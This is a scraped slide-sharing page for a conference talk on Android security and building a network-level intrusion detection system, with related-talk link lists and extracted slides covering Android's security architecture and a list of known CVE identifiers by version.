Zimperium - Technology BriefingJake Leonard
 
Mobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by ZimperiumMobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by ZimperiumZimperium
 
Technology Report
Technology ReportTechnology Report
Technology ReportMarq2014
 
It Security For Healthcare
It Security For HealthcareIt Security For Healthcare
It Security For HealthcareNicholas Davis
 
Data transfer security for mobile apps
Data transfer security for mobile appsData transfer security for mobile apps
Data transfer security for mobile appsStanfy
 
Introduction to Android
Introduction to Android Introduction to Android
Introduction to Android Suraj Ligade
 
Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
Mobile security
Mobile securityMobile security
Mobile securityStefaan
 
SMART PHONE
SMART PHONE SMART PHONE
SMART PHONE kaushalDesai22
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortVincent Ohprecio
 
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012Dr David Probert
 

Weitere ähnliche Inhalte

Andere mochten auch

Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...Jaime Sánchez
 
Defeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyDefeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyJaime Sánchez
 
Mobile security
Mobile securityMobile security
Mobile securityhome
 
ศิลปินในดวงใจ
ศิลปินในดวงใจศิลปินในดวงใจ
ศิลปินในดวงใจicesmurf
 
SIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEBSIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEBMerlin Govender
 
Deutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - ZimperiumDeutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - ZimperiumZimperium
 
Security As A Service
Security As A ServiceSecurity As A Service
Security As A Serviceguest536dd0e
 
How to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat IntelligenceHow to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat IntelligenceZimperium
 
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...CA API Management
 
Zimperium - Technology Briefing
Zimperium - Technology BriefingZimperium - Technology Briefing
Zimperium - Technology BriefingJake Leonard
 
Mobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by ZimperiumMobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by ZimperiumZimperium
 
Technology Report
Technology ReportTechnology Report
Technology ReportMarq2014
 
It Security For Healthcare
It Security For HealthcareIt Security For Healthcare
It Security For HealthcareNicholas Davis
 
Data transfer security for mobile apps
Data transfer security for mobile appsData transfer security for mobile apps
Data transfer security for mobile appsStanfy
 
Introduction to Android
Introduction to Android Introduction to Android
Introduction to Android Suraj Ligade
 

Andere mochten auch (16)

Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
 
Defeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyDefeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of Privacy
 
Mobile security
Mobile securityMobile security
Mobile security
 
Mobile security
Mobile securityMobile security
Mobile security
 
ศิลปินในดวงใจ
ศิลปินในดวงใจศิลปินในดวงใจ
ศิลปินในดวงใจ
 
SIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEBSIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEB
 
Deutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - ZimperiumDeutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - Zimperium
 
Security As A Service
Security As A ServiceSecurity As A Service
Security As A Service
 
How to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat IntelligenceHow to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat Intelligence
 
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
 
Zimperium - Technology Briefing
Zimperium - Technology BriefingZimperium - Technology Briefing
Zimperium - Technology Briefing
 
Mobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by ZimperiumMobile Protect Pro - Powered by Zimperium
Mobile Protect Pro - Powered by Zimperium
 
Technology Report
Technology ReportTechnology Report
Technology Report
 
It Security For Healthcare
It Security For HealthcareIt Security For Healthcare
It Security For Healthcare
 
Data transfer security for mobile apps
Data transfer security for mobile appsData transfer security for mobile apps
Data transfer security for mobile apps
 
Introduction to Android
Introduction to Android Introduction to Android
Introduction to Android
 

Ähnlich wie ANDROIDS: MOBILE SECURITY RELOADED

Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
Mobile security
Mobile securityMobile security
Mobile securityStefaan
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortVincent Ohprecio
 
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012Dr David Probert
 
Secure Messenger
Secure MessengerSecure Messenger
Secure MessengerInnovecs
 
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Subho Halder
 
Hacking your Android (slides)
Hacking your Android (slides)Hacking your Android (slides)
Hacking your Android (slides)Justin Hoang
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX MalwareSynack
 
CSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage GearCSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage Gearshawn_merdinger
 
New trends on research and software development techniques for wearable devices
New trends on research and software development techniques for wearable devicesNew trends on research and software development techniques for wearable devices
New trends on research and software development techniques for wearable devicesEveryware Technologies
 
AITP Presentation on Mobile Security
AITP Presentation on Mobile SecurityAITP Presentation on Mobile Security
AITP Presentation on Mobile SecurityJohn D. Johnson
 
Securing Internet of Things
Securing Internet of Things Securing Internet of Things
Securing Internet of Things Swapnil Deshmukh
 
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 Rome
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 RomeThe Power of the Remote // Il potere del telecomando - Arduino Day 2014 Rome
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 RomeDavide Gomba
 
Android Wear Applications in C# with Xamarin
Android Wear Applications in C# with XamarinAndroid Wear Applications in C# with Xamarin
Android Wear Applications in C# with XamarinJames Montemagno
 
Mobile Malwares Analysis - Garvit Arya
Mobile Malwares Analysis - Garvit AryaMobile Malwares Analysis - Garvit Arya
Mobile Malwares Analysis - Garvit AryaGarvit Arya
 
Mobile Banking Channel Security - Cyber Security Conference 2011
Mobile Banking Channel Security - Cyber Security Conference 2011Mobile Banking Channel Security - Cyber Security Conference 2011
Mobile Banking Channel Security - Cyber Security Conference 2011Filip Maertens
 
iOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesiOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesÖmer Coşkun
 

Ähnlich wie ANDROIDS: MOBILE SECURITY RELOADED (20)

Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS X
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play Doctor
 
Mobile security
Mobile securityMobile security
Mobile security
 
SMART PHONE
SMART PHONE SMART PHONE
SMART PHONE
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
 
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
Smart Sustainable Security - Master Class - Yerevan, Armenia - 2012
 
Secure Messenger
Secure MessengerSecure Messenger
Secure Messenger
 
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
 
Hacking your Android (slides)
Hacking your Android (slides)Hacking your Android (slides)
Hacking your Android (slides)
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX Malware
 
CSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage GearCSI - Poor Mans Guide To Espionage Gear
CSI - Poor Mans Guide To Espionage Gear
 
New trends on research and software development techniques for wearable devices
New trends on research and software development techniques for wearable devicesNew trends on research and software development techniques for wearable devices
New trends on research and software development techniques for wearable devices
 
AITP Presentation on Mobile Security
AITP Presentation on Mobile SecurityAITP Presentation on Mobile Security
AITP Presentation on Mobile Security
 
Securing Internet of Things
Securing Internet of Things Securing Internet of Things
Securing Internet of Things
 
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 Rome
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 RomeThe Power of the Remote // Il potere del telecomando - Arduino Day 2014 Rome
The Power of the Remote // Il potere del telecomando - Arduino Day 2014 Rome
 
Android Wear Applications in C# with Xamarin
Android Wear Applications in C# with XamarinAndroid Wear Applications in C# with Xamarin
Android Wear Applications in C# with Xamarin
 
Mobile Malwares Analysis - Garvit Arya
Mobile Malwares Analysis - Garvit AryaMobile Malwares Analysis - Garvit Arya
Mobile Malwares Analysis - Garvit Arya
 
Mobile Banking Channel Security - Cyber Security Conference 2011
Mobile Banking Channel Security - Cyber Security Conference 2011Mobile Banking Channel Security - Cyber Security Conference 2011
Mobile Banking Channel Security - Cyber Security Conference 2011
 
Anti virus
Anti virusAnti virus
Anti virus
 
iOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesiOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic Techniques
 

Mehr von Jaime Sánchez

La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...Jaime Sánchez
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameJaime Sánchez
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)Jaime Sánchez
 
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...Jaime Sánchez
 
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013Jaime Sánchez
 
Seguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IPSeguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IPJaime Sánchez
 

Mehr von Jaime Sánchez (6)

La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...La problemática de la identificación de los participantes en las plataformas ...
La problemática de la identificación de los participantes en las plataformas ...
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse game
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
 
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
 
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
Defeating WhatsApp’s Lack of Encryption - BH Sao Paulo 2013
 
Seguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IPSeguridad con la Pila TCP/IP
Seguridad con la Pila TCP/IP
 

Kürzlich hochgeladen

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 

Kürzlich hochgeladen (20)

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 

ANDROIDS: MOBILE SECURITY RELOADED

  • 2. ANDROIDS: MOBILE SECURITY RELOADED $"WHO"I"AM !"Passionate"about"computer"security. !"Computer"Engineering"degree"and"an"Execu7ve" MBA." !"I’m"from"Spain;"We’re"sexy"and"you"know"it. !"You"can"follow" my"adventures" at"@segofensiva" or"in"my"blog"h?p://www.seguridadofensiva.com !""Other"conferences: !"RootedCON"in"Spain !"Nuit"Du"Hack"in"Paris" !"Black"Hat"Arsenal"in"USA !"Defcon"in"USA !"... JAIME SÁNCHEZ (@SEGOFENSIVA) 2 DEEPSEC
  • 3. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MOTIVATIONS !" Smartphones" have" evolved" into" sophisGcated," compact"minicomputers !"Stores"sensiGve/private"informaGon"and"services !"Smartphones"usage"is"on"the"raise" !"SuscepGble"to"various"PCKlike"types"of"aLacks !" The" importance" of" security" mechanisms" is" not" yet"understood !"Security"mechanisms"are"not"sufficient !"Variety"of"plaOorms JAIME SÁNCHEZ (@SEGOFENSIVA) 3 DEFCON 21 DEEPSEC
  • 4. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED WHY"ANDROID? !"Being"popular"is"not"always"a"good"thing. !"Mobile"malware"and"threats"are"clearly"on"the"rise. !"Over" 100" million"Android"phones" shipped"in"the"second"quarter" of"2012" alone. !""Targets"this"large"are"difficult"for"a?ackers"to"resist!" JAIME SÁNCHEZ (@SEGOFENSIVA) 4 DEFCON 21 DEEPSEC
  • 5. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED THE"PLATFORM !" Android" has" inherited" powerful" base"systems"from"Linux"Kernel"such" as" the" memory" management," mulGtasking"and"file"management. !" Android" is" a" plaOorm" which" embraces" numerous" technologies" like" Linux" Kernel," C++," Java," Dalvik" VM,"etc. !" Android" has" a" processRunit" component" model" and" provides" system" func7ons" as" server" processes." For" a" funcGonal" meshKup" of" processes," it" provides"Binder. !"Why"has"a"new"mechanism"been"developed,"rather"than"using"(IPC),"such" as"sockets"and"pipes"provided"by"Linux?"It"is"because"of"performance. JAIME SÁNCHEZ (@SEGOFENSIVA) 5 DEFCON 21 DEEPSEC
  • 6. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED SECURITY"ARCHITECTURE !" Android" seeks" to" be" the" most" secure" and" usable" operaGng" system" for" mobile" plaOorms" by" reKpurposing" tradiGonal" operaGng" system" security" controls"to: !"Protect"user"data !"Protect"system"resources"(including"the"network) !"Provide"applicaGon"isolaGon !"To"achieve"these"objecGves,"Android"provides"these"key"security"features: !"Robust"security"at"the"OS"level"through"the"Linux"kernel !"Mandatory"applicaGon"sandbox"for"all"applicaGons !"Secure"interprocess"communicaGon !"ApplicaGon"signing !"ApplicaGonKdefined"and"userKgranted"permissions !" Each" component" assumes" that" the" components" below" are" properly" secured. JAIME SÁNCHEZ (@SEGOFENSIVA) 6 DEFCON 21 DEEPSEC
  • 7. THE"PROBLEM"? There is a massive growth in the volume of malware families and samples ... Google"Play’s"track"record"with"malware"is"not"too" good"(Bouncer"can"be"compromised)"...
  • 9. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Android v1.0 CVE-2009-0475 (Remote code execution) CVE-2009-0606 (Privilege Escalation) CVE-2009-0607 (Multiple Integer Overflows) CVE-2009-0608 (Integer Overflow) CVE-2009-1895 (Privilege Escalation) CVE-2009-1754 (Access to Sensitive Information) CVE-2009-2348 (Access to Camera and Record Audio) CVE-2009-2656 (DoS through SMS) CVE-2009-2999 (DoS through SMS) CVE-2009-3698 (DoS through Dalvik API) CVE-2009-1185 (Privilege Escalation) CVE-2009-1186 (DoS through udev) Android v2.0 CVE-2009-1442 (Code Execution) CVE-2010-EASY (Privilege Escalation) CVE-2009-2692 (Privilege Escalation) CVE-2010-1807 (WebKitPrivilege Escalation) CVE-2010-1119 (WebKit Privilege Escalation) CVE-2011-1149 (Privilege Escalation) CVE-2011-3975 (Access to Sensitive Information) CVE-2011-2357 (Cross-Application Scripting) CVE-2011-0680 (Access to Sensitive Information) CVE-2011-2344 (Gain Privileges and Access Pictures) CVE-2011-1823 (Code Execution) JAIME SÁNCHEZ (@SEGOFENSIVA) Android v3.0 CVE-2010-4804 (Information Disclosure) CVE-2011-1823 (Privilege Escalation) CVE-2011-0640 (Code Execution) CVE-2011-1349 (DoS) CVE-2011-1350 (Privilege Escalation) CVE-2011-1352 (Privilege Escalation) CVE-2011-2343 (Access to Sensitive Information) CVE-2011-3874 (Privilege Escalation) CVE-2011-2357 (Bypass Permissions) 9 DEFCON 21 DEEPSEC
